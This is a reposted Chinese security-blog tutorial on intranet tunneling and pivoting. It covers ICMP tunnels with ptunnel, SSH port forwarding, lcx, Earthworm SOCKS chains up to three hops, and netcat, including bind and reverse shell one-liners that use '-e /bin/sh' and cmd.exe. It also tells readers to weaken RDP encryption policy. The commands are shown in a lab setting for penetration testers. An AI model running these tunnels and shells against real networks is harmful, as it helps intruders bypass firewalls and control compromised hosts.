内网隧道技术,你知道几个?
The following article is from 戟星安全实验室 Author Me5
公众号现在只对常读和星标的公众号才展示大图推送,
建议大家把听风安全设为星标,否则可能就看不到啦!
----------------------------------------------------------------------
0x00 前言
在实际环境中,会有各种网络设备、防火墙以及入侵检测系统阻止外网与内网的通信,我们构建内网隐蔽通道来突破安全策略的限制,实现对目标机器的控制。当我们在外网成功getshell之后,可以通过端口转发、内网穿透等方式进一步入侵内网,当我们取得内网机器时可以通过隧道来绕过防火墙等。
0x01 ICMP隧道搭建
PingTunnel
建立 ICMP 隧道,将 TCP/UDP 数据封装到 ICMP 的 ping 数据包中,从而穿过防火墙(防火墙一般不会屏蔽 ping 的数据包)。
拓扑:
192.168.111.129(攻击机)—>192.168.111.132/10.10.10.129(跳板机)—>10.10.10.10(目标)
当我们拿到web服务器权限准备内网时,就可以搭建隧道,这里跳板机充当web服务器。
环境配置:
192.168.111.129(攻击机kali,与本机同一网段)192.168.111.132/10.10.10.10(跳板机centos7)10.10.10.10(目标)操作步骤:
跳板机centos7操作:
ptunnel -x zzzpingtunnel在kali上已经集成好了,直接使用就可以:
ptunnel -p 192.168.111.20 -lp 6666 -da 10.10.10.20 -dp 3389 -x zzz-p 指定ICMP隧道另一端的IP-lp:指定本地监听的端口-da:指定要转发的目标机器的IP-dp:指定要转发的目标机器的端口-x:指定连接密码隧道已经搭建,我们在kali上直接rdp连接自身的ip和8888端口其实就是连接目标的3389了
这里用跟kali同网段的本机测试
成功连接
这里本机rdp证书可能会出现问题,如果报“出现身份验证错误,要求的函数不支持”错误的话,需要去策略编辑器修改
”gpedit.msc“调出本地组策略编辑器
找到“管理模板”-“系统“-”凭证分配”-“加密数据库修正”,启用并将保护级别选择“易受攻击”
最后如果是Linux机器可以尝试22端口,windows则为演示的3389端口
0x02 SSH隧道
一般情况下,SSH协议是允许通过防火墙和边界设备的,而且SSH协议的传输过程是加密的,所以很难区分合法的SSH会话和攻击者利用其他网络建立的隧道。我们使用SSH端口隧道突破防火墙后可以建立一些之前无法建立的TCP连接。
参数:
-C:压缩传输,提高传输速度-f:将SSH传输转入后台执行,不占用当前的Shell-N:建立静默连接(建立了连接,但是看不到具体会话)-g:允许远程主机连接本地用于转发的端口-L:本地端口转发-R:远程端口转发-D:动态转发(SOCKS代理)-P:指定SSH端口环境搭建:
攻击机kali:192.168.111.129跳板机centos7:192.168.111.131/10.10.10.129目标机pc:10.10.10.201本地转发:
以centos7为跳板,将内网主机的3389端口映射到攻击机的6666端口,此时访问攻击机的6666端口,就可以访问内网主机的3389端口了
操作步骤:
在攻击机上操作
ssh -CfNg -L 攻击机端口 : 目标ip : 目标端口 root@192.168.111.131(跳板机)远程转发:
以centos7为跳板,将攻击机的5555端口的流量转发到内网主机的3389端口,然后访问攻击机的5555端口,就可以访问内网主机的3389端口了
操作步骤:
在跳板机上操作
ssh -CfNg -R 5555(攻击机端口):目标ip:3389(目标端口) root@192.168.111.129(攻击机ip)0x03 LCX端口转发
lcx 是一个基于Socket套接字实现的端口转发工具,有Windows和Linux两个版本。Windows 版为lcx.exe, Linux 版为portmap。一个正常的Socket隧道必须具备两端:一端为服务端,监听一个端口,等待客户端的连接;另一端为客户端;通过传人服务端的IP地址和端口,才能主动与服务器连接。
工具下载地址
https://github.com/Brucetg/Pentest-tools/tree/master/环境搭建:
192.168.111.201(目标机器)192.168.111.80(攻击机)内网端口转发:
执行方法:
目标机器执行:
lcx.exe -slave 攻击机IP地址 9999 127.0.0.1 3389VPS执行:
lcx.exe -listen 9999 10000完成后,在本机上远程连接攻击机的10000端口或是在攻击机本地远程连接127.0.0.1的10000端口即可远程连接到目标机器
操作步骤:
目标机器执行:
攻击机执行:
完成后我们在本机rdp攻击机+端口或攻击机rdp自身+端口就可以远程连接到目标机器了
本地端口映射:
如果目标防火墙不允许3389通过,那么我们可以将目标的相应端口转发到可以通过防火墙的端口,比如53端口,然后直接远程53端口就可以连接到目标机器
执行方法:
目标机器执行:
lcx -tran 53 目标IP地址 3389操作步骤:
目标机器执行:
然后本机直接远程目标53端口即可
0x04 netcat
使用方法:
d:后台模式e:程序重定向g 网关:设置路由器跃程通信网关,最多可设置8个G 指向器数目:设置源路由指向器的数量,值为4的倍数h:帮助i 延迟秒数 :设置时间间隔,以便传送信息及扫描通信端口l:使用监听模式,管理和控制传人的数据n:直接使用IP地址(不通过域名服务器)o 输出文件:指定文件名称,把往来传输的数据转换为十六进制字节码后保存在该文件中p 通信端口:设置本地主机使用的通信端口r:随机指定本地与远程主机的通信端口s 源地址:设置本地主机送出数据包的IP地址u:使用UDP传输协议v:详细输出w 超时秒数:设置等待连线的时间z:将输人/输出功能关闭,只在扫描通信端口时使用端口扫描:
nc -v ip port 扫指定端口nc -v -z ip port-port 扫端口段文件传输:
接收方:
nc -lvvp 7777发送方:
nc -vn 192.168.111.129 7777 < 1.txt -q l聊天:
接收方:
nc -lvvp 7777发送方:
nc -vn 192.168.111.129 7777正向shell:
目标机器:
Linux:nc -lvvp 8888 -e /bin/shWindows:nc -lvp 4444 -e c:\windows\system32\cmd.exe攻击机器:
nc 目标ip 8888反向shell:
目标机器:
Linux:nc 192.168.220.165 9999 -e /bin/shWindows:nc 192.168.220.165 9999 -e C:\windows\system32\cmd.exe攻击机:
nc -lvp 99990x05 Earthworm
EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式搭建一条网络隧道。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内。
下载地址:
https://github.com/idlefire/ew使用方法:
该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)
例如:./xxx -s ssocksd -h
-s 指定工作模式。工作模式支持如下:
ssocksd , rcsocks , rssocks ,lcx_listen , lcx_tran , lcx_slave
ssocksd 创建正向socks代理服务端,监听在本地,直接把当前环境socks代理出去。rssocks 创建反向socks代理服务端rcsocks 反向socks代理客户端lcx_tran 正向tcp端口转发,监听在本地lcx_slave 反向tcp转发客户端lcx_listen 反向tcp服务端-l listenport为服务器打开一个监听端口。-d refhost 设置反射主机地址。-e refport 设置反射端口。-f connhost 设置连接主机地址。-g connport 设置连接端口。-h help 显示帮助文本,通过添加 -s 参数,您还可以查看更详细的帮助。-a about 显示关于页面-v version 显示版本。-t usectime 设置超时的毫秒数。默认的值为 1000正向代理:
适用于被控主机存在公网ip且可以任意开启监听端口
环境搭建:
攻击机kali:192.168.111.129被控主机win7:192.168.111.201/10.10.10.201内网机器2003:10.10.10.10操作步骤:
将exe传入被控主机,在被控主机开启监听端口
ew_for_Win.exe -s ssocksd -l 6666在kali使用proxifier工具连接ew
配置文件—代理服务器—添加
填入被控主机ip和监听端口,选择socks5
然后就可以rdp内网机器了
反向代理:
目标网络边界不存在公网IP,能够访问内网资源,可以访问公网,需要通过反弹方式创建 socks 代理
环境搭建:
攻击机kali:192.168.111.129被控主机win7:192.168.111.201/10.10.10.201内网机器2003:10.10.10.10操作步骤:
在vps上添加隧道,将6666收到的代理请求转发到反向连接8888端口的被控机器
./ew_for_linux64 -s rcsocks -l 6666 -e 8888被控机器执行
ew_for_Win.exe -s rssocks -d 192.168.111.129 -e 8888当vps出现下图时说明成功
再使用proxifier连接vps监听的端口
配置文件—代理服务器—添加
填入vps ip和监听端口,选择socks5
然后就可以rdp内网机器了
二级代理(一):
在获得边界服务器 被控机器1 的shell后,通过横向到内网1中的 被控机器2 ,发现 被控机器2 同时还存在另一个内网2,但 被控机器2 所处的内网2无法访问公网,公网也无法访问 被控机器2 所在内网2 ,但是 被控机器2 可以单向访问 被控机器1 ,这时需要把 被控机器2 所在的内网2的流量代理出来。
环境搭建:
攻击机(本机):192.168.111.1vps(kali):192.168.111.129被控主机1(win7):192.168.111.134/10.10.10.200被控主机2(win7PC):192.168.48.129/10.10.10.201内网主机(2003):192.168.48.128操作步骤:
在VPS(kali)上添加隧道,通过ew的lcx_listen模块监听本机6666端口,将6666端口收到的代理请求转发到反连8888端口的主机:
ew_for_Win.exe -s lcx_listen -l 6666 -e 8888在被控机器1上启动监听本机端口9999,并将9999端口接收到的代理流量,转发给vps的8888端口:
ew_for_Win.exe -s lcx_tran -l 被控主机1本机端口 -f 攻击者的公网vps_IP -g 8888 在被控机器2启动SOCKS v5代理服务端,并反弹到被控机器1的8888端口 :
ew_for_Win.exe -s rssocks -d 10.10.10.200 -e 9999再使用proxifier连接vps监听的端口
配置文件—代理服务器—添加
填入vps ip和监听端口,选择socks5
然后就可以rdp内网机器了
二级代理(二):
在获得边界服务器被控机器1的webshell后,发现被控机器1没有公网IP,但处于边界的被控机器1可访问公网;攻击者通过横向移动到内网1中的被控机器2,发现被控机器2同时处于另一个内网2中,但被控机器2所处的内网2无法访问公网,公网也无法访问被控机器2所在内网2 ,但处于边界的被控主机1却可以单向访问被控机器2所处的内网2,这时需要把被控机器2所在的内网2的流量代理出来。
环境搭建:
攻击机(本机):192.168.111.1vps(kali):192.168.111.129被控主机1(win7):192.168.111.134/10.10.10.200被控主机2(win7PC):192.168.48.129/10.10.10.201内网主机(2003):192.168.48.128操作步骤:
在vps添加转接隧道,通过ew的lcx_listen模块监听本机的6666端口,把6666端口接受到的代理请求,转发到反连8888端口的主机:
ew_for_Win.exe -s lcx_listen -l 6666 -e 8888在内网2中的被控机器2上通过ssocksd模块,开启正向代理服务,通过ssocksd模块监听被控机器2的9999端口,通过正向代理,把外流量引向内网:
ew_for_Win.exe -s ssocksd -l 9999在内网1中的被控机器1运行以下命令,通过ew的lcx_slave流量转发模块,将正向连接到vps的8888端口,而获得的代理请求流量,转发给内网2的被控机器2,从而获得内网2的内网流量:
ew_for_Win.exe -s lcx_slave -d 攻击者的公网vps_IP -e 8888 -f 处于2级内网的被控主机 -g 9999再使用proxifier连接vps监听的端口
配置文件—代理服务器—添加
填入vps ip和监听端口,选择socks5
然后就可以rdp内网机器了
三级代理:
内网主机 A 没有公网 IP ,但是可以访问外网,内网主机 B 不能访问外网,但是可以和 A 相互访问,内网主机 C 能访问内网资源,但是只能和 B 相互访问,我们如果想访问内网资源就需要做三层代理。
vps—>内网主机A—>内网主机B—>内网主机C
操作步骤:
在公网 VPS 上,将 1080 端口收到的代理请求转发到 4444 端口
ew_for_linux64 -s rcsocks -l 1080 -e 4444在内网主机 A 上,将 VPS 的 4444 端口和内网主机 B 的 5555 端口连接起来
./ew_for_linux64 -s lcx_slave -d 172.16.214.1 -e 4444 -f192.168.7.110 -g 5555在内网主机 B 上,将 5555 端口收到的代理请求转发到 6666 端口上
.\ew_for_Win.exe -s lcx_listen -l 5555 -e 6666在内网主机 C 上,启动 socks5 服务,并反弹到 B 主机的 6666 端口上
.\ew_for_Win.exe -s rssocks -d 192.168.7.110 -e 6666之后访问VPS的1080端口就可以访问到内网资源了
觉得内容不错,就点下“赞”和“在看”
如果不想错过新的内容推送可以设为星标